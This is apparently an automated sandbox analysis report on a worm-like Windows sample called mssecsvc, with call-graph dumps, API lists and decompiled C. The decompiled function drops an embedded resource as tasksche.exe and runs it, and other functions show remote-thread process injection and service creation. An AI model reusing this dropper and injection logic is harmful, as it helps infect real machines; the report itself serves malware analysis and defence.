6633->6634 6634->6613 6634->6619 6634->6621 6634->6622 6634->6625 6634->6626 6634->6627 6634->6628 6634->6631 6634->6632 6634->6633 6635 7fea05ba Sleep 6634->6635 6665 7fea07ac 6634->6665 6635->6632 6637 7fea10db 6636->6637 6637->6636 6638 7fea115c 6637->6638 6639 7fea1133 GetModuleHandleA GetProcAddress 6637->6639 6638->6607 6639->6637 6641 7fea05c9 6640->6641 6642 7fea05bf Sleep 6640->6642 6641->6613 6642->6640 6644 7fea10ce 2 API calls 6643->6644 6660 7fea060e 6644->6660 6645 7fea05a9 CloseHandle 6645->6643 6646 7fea06fc lstrcpyW 6647 7fea24ae 3 API calls 6646->6647 6647->6660 6648 7fea074c NtMapViewOfSection 6648->6645 6648->6660 6649 7fea0717 GetPEB lstrcpyW lstrcatW 6650 7fea24ae 3 API calls 6649->6650 6650->6660 6651 7fea0780 NtOpenProcessToken 6652 7fea07c5 CreateToolhelp32Snapshot Process32First 6651->6652 6651->6660 6652->6660 6653 7fea07eb Process32Next 6656 7fea0865 CloseHandle 6653->6656 6653->6660 6654 7fea2574 5 API calls 6654->6660 6655 7fea07ac 30 API calls 6655->6660 6656->6645 6657 7fea07fd OpenProcess 6657->6653 6657->6660 6658 7fea085c CloseHandle 6658->6653 6659 7fea0834 CreateRemoteThread 6659->6658 6659->6660 6660->6645 6660->6646 6660->6648 6660->6649 6660->6651 6660->6652 6660->6653 6660->6654 6660->6655 6660->6657 6660->6658 6660->6659 6661 7fea05ba Sleep 6660->6661 6661->6658 6663 7fea6c24 6662->6663 6664 7fea24ea NtCreateSection 6663->6664 6664->6634 6687 7fea144a LookupPrivilegeValueA NtAdjustPrivilegesToken 6665->6687 6667 7fea07b2 FreeLibrary CloseHandle 6668 7fea07c5 CreateToolhelp32Snapshot Process32First 6667->6668 6677 7fea060e 6668->6677 6669 7fea07eb Process32Next 6671 7fea0865 CloseHandle 6669->6671 6669->6677 6670 7fea2574 5 API calls 6670->6677 6672 7fea05a9 CloseHandle 6671->6672 6675 7fea05f2 GetModuleHandleA 6672->6675 6673 7fea07fd OpenProcess 6673->6669 6673->6677 6674 7fea085c CloseHandle 6674->6669 6678 7fea10ce 2 API calls 6675->6678 6676 7fea0834 CreateRemoteThread 6676->6674 6676->6677 6677->6668 6677->6669 6677->6670 6677->6672 6677->6673 6677->6674 6677->6676 6679 7fea05ba Sleep 6677->6679 6680 7fea06fc lstrcpyW 6677->6680 6682 7fea074c NtMapViewOfSection 6677->6682 6683 7fea0717 GetPEB lstrcpyW lstrcatW 6677->6683 6685 7fea0780 NtOpenProcessToken 6677->6685 6686 7fea07ac 13 API calls 6677->6686 6678->6677 6679->6674 6681 7fea24ae 3 API calls 6680->6681 6681->6677 6682->6672 6682->6677 6684 7fea24ae 3 API calls 6683->6684 6684->6677 6685->6668 6685->6677 6686->6677 6687->6667 7329 b02665 7331 b0266b CreateThread CloseHandle 7329->7331 7332 b03c38 7331->7332 7334 b03c3d 7332->7334 7335 b03ca9 7334->7335 7340 b03c5b GetWindowsDirectoryA 7334->7340 7389 b0252f NtOpenSection 7335->7389 7337 b03cae 7338 b03cb5 7337->7338 7339 b03cfb GetSystemDirectoryA 7337->7339 7390 b03cc2 GetModuleHandleA 7338->7390 7434 b03d1f lstrcat 7339->7434 7342 b03d26 7340->7342 7476 b03d36 LoadLibraryA 7342->7476 7389->7337 7391 b03cde 7390->7391 7392 b03ccc 7390->7392 7517 b03cf0 GetModuleHandleA 7391->7517 7394 b03cd4 GetProcAddress 7392->7394 7394->7391 7435 b03d26 7434->7435 7436 b03d36 151 API calls 7435->7436 7437 b03d2b GetProcAddress LoadLibraryA 7436->7437 7439 b010ce 2 API calls 7437->7439 7440 b03d7d 7439->7440 7441 b03d92 GetTickCount 7440->7441 7442 b03daa 7441->7442 7443 b03e47 GetVolumeInformationA 7442->7443 7444 b03e7a 7443->7444 7445 b03f25 7444->7445 7446 b03eb5 96 API calls 7444->7446 7447 b03f31 CreateThread CloseHandle 7445->7447 7448 b03f4f 7445->7448 7449 b03ea9 7446->7449 7447->7448 7450 b03f60 43 API calls 7448->7450 7449->7445 7451 b03f14 7449->7451 7452 b03eca GetModuleFileNameA wsprintfA 7449->7452 7453 b03f54 7450->7453 7451->7445 7454 b03405 5 API calls 7451->7454 7452->7451 7455 b010ce 2 API calls 7453->7455 7454->7445 7456 b03f7e 7455->7456 7457 b03f8f 23 API calls 7456->7457 7458 b03f83 7457->7458 7459 b03fd3 CreateThread CloseHandle 7458->7459 7460 b03ffa CreateEventA 7458->7460 7459->7460 7473 b04012 7460->7473 7461 b04065 gethostbyname 7461->7473 7462 b04056 lstrlen 7462->7461 7462->7462 7463 b04081 socket 7466 b040a6 connect 7463->7466 7463->7473 7464 b04320 RtlExitUserThread 7465 b042d0 SetEvent 7465->7473 7468 b042b7 closesocket 7466->7468 7466->7473 7467 b042f2 Sleep ResetEvent 7467->7473 7468->7473 7469 b040ef GetVersionExA 7469->7473 7470 b04172 wsprintfA 7470->7473 7471 b041a7 CreateThread CloseHandle 7471->7473 7472 b041f6 GetTickCount 7472->7473 7473->7461 7473->7462 7473->7463 7473->7464 7473->7465 7473->7467 7473->7468 7473->7469 7473->7470 7473->7471 7473->7472 7474 b04288 Sleep 7473->7474 7474->7473 7475 b04294 GetTickCount 7474->7475 7475->7473 7674 b03d4b GetProcAddress LoadLibraryA 7476->7674 7560 b026d4 7517->7560 7520 b03d1f 179 API calls 7521 b03d12 GetProcAddress LoadLibraryA 7520->7521 7523 b010ce 2 API calls 7521->7523 7524 b03d7d 7523->7524 7525 b03d92 GetTickCount 7524->7525 7526 b03daa 7525->7526 7527 b03e47 GetVolumeInformationA 7526->7527 7528 b03e7a 7527->7528 7529 b03f25 7528->7529 7562 b03eb5 LoadLibraryA 7528->7562 7531 b03f31 CreateThread CloseHandle 7529->7531 7532 b03f4f 7529->7532 7531->7532 7594 b03f60 LoadLibraryA 7532->7594 7561 b026c8 GetSystemDirectoryA 7560->7561 7561->7520 7616 b03ecc GetProcAddress GetModuleFileNameA wsprintfA 7562->7616 7595 b03f7e 7594->7595 7596 b010ce 2 API calls 7594->7596 7597 b03f8f 23 API calls 7595->7597 7596->7595 7598 b03f83 7597->7598 7599 b03fd3 CreateThread CloseHandle 7598->7599 7600 b03ffa CreateEventA 7598->7600 7599->7600 7613 b04012 7600->7613 7601 b04065 gethostbyname 7601->7613 7602 b04056 lstrlen 7602->7601 7602->7602 7603 b04081 socket 7606 b040a6 connect 7603->7606 7603->7613 7604 b04320 RtlExitUserThread 7605 b042d0 SetEvent 7605->7613 7608 b042b7 closesocket 7606->7608 7606->7613 7607 b042f2 Sleep ResetEvent 7607->7613 7608->7613 7609 b040ef GetVersionExA 7609->7613 7610 b04172 wsprintfA 7610->7613 7611 b041a7 CreateThread CloseHandle 7611->7613 7612 b041f6 GetTickCount 7612->7613 7613->7601 7613->7602 7613->7603 7613->7604 7613->7605 7613->7607 7613->7608 7613->7609 7613->7610 7613->7611 7613->7612 7614 b04288 Sleep 7613->7614 7614->7613 7615 b04294 GetTickCount 7614->7615 7615->7613 7617 b03f14 7616->7617 7618 b03f25 7617->7618 7645 b03405 7617->7645 7620 b03f31 CreateThread CloseHandle 7618->7620 7621 b03f4f 7618->7621 7620->7621 7622 b03f60 43 API calls 7621->7622 7623 b03f54 7622->7623 7624 b010ce 2 API calls 7623->7624 7625 b03f7e 7624->7625 7653 b03f8f LoadLibraryA 7625->7653 7646 b0343b 7645->7646 7646->7646 7647 b03440 NtOpenSection 7646->7647 7648 b0345f NtQuerySystemInformation 7647->7648 7652 b035f3 7647->7652 7649 b0346f MapViewOfFile CloseHandle 7648->7649 7651 b034b0 7649->7651 7649->7652 7650 b034b7 UnmapViewOfFile 7650->7652 7651->7650 7651->7652 7652->7618 7654 b04320 RtlExitUserThread 7653->7654 7655 b03f9d 7653->7655 7656 b010ce 2 API calls 7655->7656 7657 b03fb5 7656->7657 7657->7654 7658 b03fc2 WSAStartup CreateThread CloseHandle 7657->7658 7659 b03ffa CreateEventA 7658->7659 7671 b04012 7659->7671 7660 b04065 gethostbyname 7660->7671 7661 b04056 lstrlen 7661->7660 7661->7661 7662 b04081 socket 7664 b040a6 connect 7662->7664 7662->7671 7663 b042d0 SetEvent 7663->7671 7666 b042b7 closesocket 7664->7666 7664->7671 7665 b042f2 Sleep ResetEvent 7665->7671 7666->7671 7667 b040ef GetVersionExA 7667->7671 7668 b04172 wsprintfA 7668->7671 7669 b041a7 CreateThread CloseHandle 7669->7671 7670 b041f6 GetTickCount 7670->7671 7671->7654 7671->7660 7671->7661 7671->7662 7671->7663 7671->7665 7671->7666 7671->7667 7671->7668 7671->7669 7671->7670 7672 b04288 Sleep 7671->7672 7672->7671 7673 b04294 GetTickCount 7672->7673 7673->7671 7675 b03d7d 7674->7675 7676 b010ce 2 API calls 7674->7676 7677 b03d92 GetTickCount 7675->7677 7676->7675 7678 b03daa 7677->7678 7679 b03e47 GetVolumeInformationA 7678->7679 7680 b03e7a 7679->7680 7681 b03f25 7680->7681 7682 b03eb5 96 API calls 7680->7682 7683 b03f31 CreateThread CloseHandle 7681->7683 7684 b03f4f 7681->7684 7685 b03ea9 7682->7685 7683->7684 7686 b03f60 43 API calls 7684->7686 7685->7681 7687 b03f14 7685->7687 7688 b03eca GetModuleFileNameA wsprintfA 7685->7688 7689 b03f54 7686->7689 7687->7681 7690 b03405 5 API calls 7687->7690 7688->7687 7691 b010ce 2 API calls 7689->7691 7690->7681 7692 b03f7e 7691->7692 7693 b03f8f 23 API calls 7692->7693 7694 b03f83 7693->7694 7695 b03fd3 CreateThread CloseHandle 7694->7695 7696 b03ffa CreateEventA 7694->7696 7695->7696 7709 b04012 7696->7709 7697 b04065 gethostbyname 7697->7709 7698 b04056 lstrlen 7698->7697 7698->7698 7699 b04081 socket 7702 b040a6 connect 7699->7702 7699->7709 7700 b04320 RtlExitUserThread 7701 b042d0 SetEvent 7701->7709 7704 b042b7 closesocket 7702->7704 7702->7709 7703 b042f2 Sleep ResetEvent 7703->7709 7704->7709 7705 b040ef GetVersionExA 7705->7709 7706 b04172 wsprintfA 7706->7709 7707 b041a7 CreateThread CloseHandle 7707->7709 7708 b041f6 GetTickCount 7708->7709 7709->7697 7709->7698 7709->7699 7709->7700 7709->7701 7709->7703 7709->7704 7709->7705 7709->7706 7709->7707 7709->7708 7710 b04288 Sleep 7709->7710 7710->7709 7711 b04294 GetTickCount 7710->7711 7711->7709 6544 409a16 __set_app_type __p__fmode __p__commode 6545 409a85 6544->6545 6546 409a99 6545->6546 6547 409a8d __setusermatherr 6545->6547 6556 409b8c _controlfp 6546->6556 6547->6546 6549 409a9e _initterm __getmainargs _initterm 6550 409af2 GetStartupInfoA 6549->6550 6552 409b26 GetModuleHandleA 6550->6552 6557 408140 InternetOpenA InternetOpenUrlA InternetCloseHandle InternetCloseHandle 6552->6557 6556->6549 6560 408090 GetModuleFileNameA __p___argc 6557->6560 6559 4081b2 exit _XcptFilter 6561 4080b0 6560->6561 6562 4080b9 OpenSCManagerA 6560->6562 6571 407f20 6561->6571 6564 408101 StartServiceCtrlDispatcherA 6562->6564 6565 4080cf OpenServiceA 6562->6565 6564->6559 6566 4080fc CloseServiceHandle 6565->6566 6567 4080ee 6565->6567 6566->6564 6576 407fa0 ChangeServiceConfig2A 6567->6576 6570 4080f6 CloseServiceHandle 6570->6566 6588 407c40 sprintf OpenSCManagerA 6571->6588 6573 407f25 6577 407ce0 GetModuleHandleW 6573->6577 6576->6570 6578 407d01 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 6577->6578 6579 407f08 6577->6579 6578->6579 6580 407d49 6578->6580 6579->6559 6580->6579 6581 407d69 FindResourceA 6580->6581 6581->6579 6582 407d84 LoadResource 6581->6582 6582->6579 6583 407d94 LockResource 6582->6583 6583->6579 6584 407da7 SizeofResource 6583->6584 6584->6579 6585 407db9 sprintf sprintf MoveFileExA CreateFileA 6584->6585 6585->6579 6586 407e54 WriteFile CloseHandle CreateProcessA 6585->6586 6586->6579 6587 407ef2 CloseHandle CloseHandle 6586->6587 6587->6579 6589 407c74 CreateServiceA 6588->6589 6590 407cca 6588->6590 6591 407cbb CloseServiceHandle 6589->6591 6592 407cad StartServiceA CloseServiceHandle 6589->6592 6590->6573 6591->6573 6592->6591 7712 b0116f LoadLibraryA 7715 b01196 GetProcAddress 7712->7715 7714 b01180 7715->7714 6851 b00fd6 6852 b010a0 6851->6852 6853 b0115c 6852->6853 6854 b01133 GetModuleHandleA GetProcAddress 6852->6854 6854->6852 6688 b03399 6690 b033a2 6688->6690 6691 b033a9 Sleep 6690->6691 6691->6691 7284 b03819 7286 b0381f WaitForSingleObject 7284->7286 7287 b03845 7286->7287 7288 b0383b closesocket 7286->7288 7288->7287 7289 b00000 7291 b00004 7289->7291 7290 b000a1 7291->7290 7293 b0025e 7291->7293 7297 b00105 7293->7297 7296 b00278 7296->7290 7298 b00116 GetPEB 7297->7298 7298->7296 6692 b03888 6694 b0388e GetSystemTime 6692->6694 6695 b038d2 6694->6695 6696 b0390c Sleep 6695->6696 6697 b03a32 6695->6697 6698 b03924 InternetGetConnectedState 6695->6698 6699 b03954 gethostbyname 6695->6699 6702 b03a1f closesocket 6695->6702 6696->6695 6698->6695 6699->6695 6700 b0397a socket 6699->6700 6700->6695 6701 b03990 ioctlsocket connect Sleep 6700->6701 6701->6695 6702->6695 6859 7fea1196 GetProcAddress

                    Executed Functions

                    Function 00407CE0 Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 175libraryloaderfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 86%
                    			E00407CE0() {
				void _v259;
				char _v260;
				void _v519;
				char _v520;
				struct _STARTUPINFOA _v588;
				struct _PROCESS_INFORMATION _v604;
				long _v608;
				_Unknown_base(*)()* _t36;
				void* _t38;
				void* _t39;
				void* _t50;
				int _t59;
				struct HINSTANCE__* _t104;
				struct HRSRC__* _t105;
				void* _t107;
				void* _t108;
				long _t109;
				intOrPtr _t121;
				intOrPtr _t122;

				_t104 = GetModuleHandleW(L"kernel32.dll");
				if(_t104 != 0) {
					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
					 *0x431460 = GetProcAddress(_t104, "WriteFile");
					_t36 = GetProcAddress(_t104, "CloseHandle");
					 *0x43144c = _t36;
					if( *0x431478 != 0) {
						_t121 =  *0x431458; // 0x7705f7b0
						if(_t121 != 0) {
							_t122 =  *0x431460; // 0x7705fc30
							if(_t122 != 0 && _t36 != 0) {
								_t105 = FindResourceA(0, 0x727, "R");
								if(_t105 != 0) {
									_t38 = LoadResource(0, _t105);
									if(_t38 != 0) {
										_t39 = LockResource(_t38);
										_v608 = _t39;
										if(_t39 != 0) {
											_t109 = SizeofResource(0, _t105);
											if(_t109 != 0) {
												_v520 = 0;
												memset( &_v519, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												_v260 = 0;
												memset( &_v259, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
												MoveFileExA( &_v520,  &_v260, 1); // executed
												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
												_t107 = _t50;
												if(_t107 != 0xffffffff) {
													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
													CloseHandle(_t107);
													_v604.hThread = 0;
													_v604.dwProcessId = 0;
													_v604.dwThreadId = 0;
													memset( &(_v588.lpReserved), 0, 0x10 << 2);
													asm("repne scasb");
													_v604.hProcess = 0;
													_t108 = " /i";
													asm("repne scasb");
													memcpy( &_v520 - 1, _t108, 0 << 2);
													memcpy(_t108 + 0x175b75a, _t108, 0);
													_v588.cb = 0x44;
													_v588.wShowWindow = 0;
													_v588.dwFlags = 0x81;
													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
													if(_t59 != 0) {
														CloseHandle(_v604.hThread);
														CloseHandle(_v604);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return 0;
			}






















                    0x00407cf5
                    0x00407cfb
                    0x00407d15
                    0x00407d22
                    0x00407d2f
                    0x00407d34
                    0x00407d3c
                    0x00407d43
                    0x00407d49
                    0x00407d4f
                    0x00407d55
                    0x00407d5b
                    0x00407d7a
                    0x00407d7e
                    0x00407d86
                    0x00407d8e
                    0x00407d95
                    0x00407d9d
                    0x00407da1
                    0x00407daf
                    0x00407db3
                    0x00407dc4
                    0x00407dc8
                    0x00407dca
                    0x00407dcc
                    0x00407ddb
                    0x00407de2
                    0x00407def
                    0x00407df1
                    0x00407e01
                    0x00407e18
                    0x00407e2c
                    0x00407e43
                    0x00407e49
                    0x00407e4e
                    0x00407e61
                    0x00407e68
                    0x00407e72
                    0x00407e7a
                    0x00407e82
                    0x00407e8b
                    0x00407e95
                    0x00407e9b
                    0x00407e9f
                    0x00407ea8
                    0x00407eb0
                    0x00407ebc
                    0x00407ed3
                    0x00407edb
                    0x00407ee0
                    0x00407ee8
                    0x00407ef0
                    0x00407ef7
                    0x00407f02
                    0x00407f02
                    0x00407ef0
                    0x00407e4e
                    0x00407db3
                    0x00407da1
                    0x00407d8e
                    0x00407d7e
                    0x00407d5b
                    0x00407d4f
                    0x00407d43
                    0x00407f14

                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F75FB10,?,00000000), ref: 00407CEF
                    • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                    • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                    • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                    • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                    • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                    • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                    • sprintf.MSVCRT ref: 00407E01
                    • sprintf.MSVCRT ref: 00407E18
                    • MoveFileExA.KERNEL32 ref: 00407E2C
                    • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
                    • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
                    • CloseHandle.KERNEL32(00000000), ref: 00407E68
                    • CreateProcessA.KERNELBASE ref: 00407EE8
                    • CloseHandle.KERNEL32(00000000), ref: 00407EF7
                    • CloseHandle.KERNEL32(08000000), ref: 00407F02
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.706408754.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.706383817.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706449396.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706496424.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706511884.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706619607.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706680871.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.708228244.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleProcResource$CloseFile$Createsprintf$FindLoadLockModuleMoveProcessSizeofWrite
                    • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                    • API String ID: 4281112323-1507730452
                    • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                    • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                    • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                    • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B0042D Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 290memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 13 b0042d-b004a4 call b010ce 16 b004a6-b004db call b0273c GetModuleHandleA 13->16 17 b004dd 13->17 19 b004e4-b00509 call b02750 GetVersion 16->19 17->19 23 b005ca-b005d1 19->23 24 b0050f-b00530 VirtualAlloc 19->24 26 b005a9-b005b3 FindCloseChangeNotification 23->26 27 b005d3-b005fc SetProcessAffinityMask call b005f2 23->27 25 b00532-b00562 call b00305 24->25 24->26 25->26 37 b00564-b0057b 25->37 26->23 32 b00621-b00623 27->32 33 b005fe-b0061c 27->33 35 b00625-b00630 32->35 36 b0064c-b00652 32->36 33->32 38 b00632 35->38 39 b00639-b00648 35->39 36->26 40 b00658-b00671 36->40 37->26 46 b0057d-b005a4 call b005ba 37->46 38->39 39->36 40->26 41 b00677-b00690 40->41 41->26 43 b00696-b0069c 41->43 44 b006d8-b006de 43->44 45 b0069e-b006b1 43->45 48 b006e0-b006f3 44->48 49 b006fc-b00715 lstrcpyW call b024ae 44->49 45->26 47 b006b7-b006bd 45->47 46->26 47->44 50 b006bf-b006d2 47->50 48->49 51 b006f5 48->51 55 b00717-b00746 GetPEB lstrcpyW lstrcatW call b024ae 49->55 56 b0074c-b00775 NtMapViewOfSection 49->56 50->26 50->44 51->49 55->26 55->56 56->26 60 b0077b-b0078f call b00305 NtOpenProcessToken 56->60 64 b00791-b007a3 call b0115d call b007ac 60->64 65 b007c5-b007e4 CreateToolhelp32Snapshot Process32First 60->65 75 b007a5 64->75 76 b0080e-b0080f 64->76 67 b007eb-b007f5 Process32Next 65->67 69 b00865-b00872 FindCloseChangeNotification 67->69 70 b007f7-b007fb 67->70 69->26 70->67 72 b007fd-b0080d OpenProcess 70->72 72->67 74 b0080f 72->74 77 b00810-b00818 call b02574 74->77 75->77 78 b007a7-b007e4 CreateToolhelp32Snapshot Process32First 75->78 76->77 82 b0081a-b00820 77->82 83 b0085c-b00863 FindCloseChangeNotification 77->83 78->67 82->83 84 b00822-b00832 82->84 83->67 84->83 85 b00834-b0084b CreateRemoteThread 84->85 85->83 86 b0084d-b00857 call b005ba 85->86 86->83
                    APIs
                    • GetModuleHandleA.KERNEL32(00000000), ref: 00B004BE
                    • GetVersion.KERNEL32 ref: 00B00500
                    • VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 00B00528
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00B005AD
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocChangeCloseFindHandleModuleNotificationVersionVirtual
                    • String ID: \BaseNamedObjects\itatVt$\BaseNamedObjects\itatVt$csrs
                    • API String ID: 2920002527-1607376603
                    • Opcode ID: c1a75dacefef55607d8e276d79dbd6456a9246beeb38c8f7a5af848b843aeecc
                    • Instruction ID: 775bc6d69aabd4a0e6fcc729b728636314efbc8215d00e786c14d42672abc0c0
                    • Opcode Fuzzy Hash: c1a75dacefef55607d8e276d79dbd6456a9246beeb38c8f7a5af848b843aeecc
                    • Instruction Fuzzy Hash: 19B1C931625249FFEB21AF24CC4ABAA3FA9FF55310F0040A9E9099E1C1C7F19F449B59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B005F2 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193stringnativeprocessCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 88 b005f2-b00615 GetModuleHandleA call b010ce 91 b00617-b00630 88->91 92 b005a9-b005b3 FindCloseChangeNotification 88->92 93 b00632 91->93 94 b00639-b00648 91->94 95 b005ca-b005d1 92->95 93->94 96 b0064c-b00652 94->96 95->92 97 b005d3-b005fc SetProcessAffinityMask call b005f2 95->97 96->92 98 b00658-b00671 96->98 105 b00621-b00623 97->105 106 b005fe-b0061c 97->106 98->92 100 b00677-b00690 98->100 100->92 102 b00696-b0069c 100->102 103 b006d8-b006de 102->103 104 b0069e-b006b1 102->104 108 b006e0-b006f3 103->108 109 b006fc-b00715 lstrcpyW call b024ae 103->109 104->92 107 b006b7-b006bd 104->107 105->96 110 b00625-b00630 105->110 106->105 107->103 111 b006bf-b006d2 107->111 108->109 112 b006f5 108->112 115 b00717-b00746 GetPEB lstrcpyW lstrcatW call b024ae 109->115 116 b0074c-b00775 NtMapViewOfSection 109->116 110->93 110->94 111->92 111->103 112->109 115->92 115->116 116->92 118 b0077b-b0078f call b00305 NtOpenProcessToken 116->118 122 b00791-b007a3 call b0115d call b007ac 118->122 123 b007c5-b007e4 CreateToolhelp32Snapshot Process32First 118->123 133 b007a5 122->133 134 b0080e-b0080f 122->134 125 b007eb-b007f5 Process32Next 123->125 127 b00865-b00872 FindCloseChangeNotification 125->127 128 b007f7-b007fb 125->128 127->92 128->125 130 b007fd-b0080d OpenProcess 128->130 130->125 132 b0080f 130->132 135 b00810-b00818 call b02574 132->135 133->135 136 b007a7-b007e4 CreateToolhelp32Snapshot Process32First 133->136 134->135 140 b0081a-b00820 135->140 141 b0085c-b00863 FindCloseChangeNotification 135->141 136->125 140->141 142 b00822-b00832 140->142 141->125 142->141 143 b00834-b0084b CreateRemoteThread 142->143 143->141 144 b0084d-b00857 call b005ba 143->144 144->141
                    APIs
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00B005AD
                    • GetModuleHandleA.KERNEL32(00B005EC), ref: 00B005F2
                    • lstrcpyW.KERNEL32(\BaseNamedObjects\itatVt,\BaseNamedObjects\itatVt), ref: 00B0070A
                    • lstrcpyW.KERNEL32(\BaseNamedObjects\itatVt,?), ref: 00B0072D
                    • lstrcatW.KERNEL32(\BaseNamedObjects\itatVt,\itatVt), ref: 00B0073B
                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 00B0076B
                    • NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 00B00786
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B007C9
                    • Process32First.KERNEL32 ref: 00B007DC
                    • Process32Next.KERNEL32 ref: 00B007ED
                    • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B00805
                    • CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00B00842
                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B0085D
                    • FindCloseChangeNotification.KERNELBASE ref: 00B0086C
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ChangeCloseFindNotification$CreateOpenProcessProcess32lstrcpy$FirstHandleModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
                    • String ID: \BaseNamedObjects\itatVt$\BaseNamedObjects\itatVt$csrs
                    • API String ID: 3804105423-1607376603
                    • Opcode ID: 32195eb0042ebaec25477c261ddf2c99814d954fd4820c083845d242e76727b2
                    • Instruction ID: ee33d0d1fe11cc1d964e6f3ef08f96cf060e41703d3cee014b274f1868e16f79
                    • Opcode Fuzzy Hash: 32195eb0042ebaec25477c261ddf2c99814d954fd4820c083845d242e76727b2
                    • Instruction Fuzzy Hash: A971A831510209FFEB21AF10CC4ABAE3FADEF59311F1040A9E9099E0D1C7B59F459B59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B0252F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 250 b0252f-b02573 NtOpenSection
                    APIs
                    • NtOpenSection.NTDLL(?,0000000E), ref: 00B0255E
                    Strings
                    • \BaseNamedObjects\itatVt, xrefs: 00B0254B
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: OpenSection
                    • String ID: \BaseNamedObjects\itatVt
                    • API String ID: 1950954290-326862825
                    • Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                    • Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
